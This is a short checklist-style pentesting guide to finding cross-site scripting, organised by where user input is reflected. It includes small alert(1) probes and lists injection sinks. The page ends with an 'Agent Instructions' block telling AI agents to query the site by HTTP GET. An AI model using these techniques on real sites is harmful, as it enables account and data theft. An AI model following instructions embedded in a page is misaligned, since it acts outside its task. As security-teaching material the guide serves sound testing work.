# XSS

## Genral m**ethodology**

### **1. Identify Reflected Values**

* Check if any value you control is reflected in the HTML or used by JavaScript.
* The values you can control include:
  * **URL parameters**
  * **Path variables**
  * **Headers (if applicable)**
  * **Cookies**

### **2. Determine the Context of Reflection**

* Locate where your input is being reflected or used:
  * **Raw HTML**
  * **Inside an HTML tag**
  * **Inside JavaScript code**
  * **Inside a JavaScript function**

***

### **3. Exploitation Based on Context**

#### **A. If Reflected in Raw HTML**

* Can you **create new HTML tags**?
* Can you **inject JavaScript execution** using events or attributes (`onerror`, `onmouseover`, etc.)?
* Can you **bypass protection mechanisms** (e.g., WAF, filtering)?
* If a JavaScript framework (e.g., AngularJS, VueJS, Mavo) is in use, check for **Client-Side Template Injection (CSTI)**.
* If JavaScript execution is blocked, consider **Dangling Markup Injection** (HTML scriptless injection).

#### **B. If Reflected Inside an HTML Tag**

* Can you escape the attribute and inject raw HTML?
* Can you add new **events/attributes** that allow JavaScript execution?
* Does the attribute where you are trapped support **JavaScript execution** (`href="javascript:alert(1)"`)?
* Can you bypass existing security protections?

#### **C. If Reflected Inside JavaScript Code**

* Can you escape the `<script>` tag and inject custom JavaScript?
* Can you **break out of strings** (`"`, `'`, `` ` ``) and execute arbitrary JavaScript?
* Are you inside **template literals** (`` ` ` ``) where expressions (`${}`) can be evaluated?
* Can you bypass security protections?

#### **D. If Used in a JavaScript Function**

* Is the application calling a function where you can control **parameters**?
* Can you exploit a **DOM XSS**?
* Check if your input reaches a **sink** (e.g., `innerHTML`, `eval()`, `document.write()`).
* Can you control a function name (e.g., `?callback=alert(1)`) to execute arbitrary JavaScript?

***

###


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/pentesting-web/xss.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.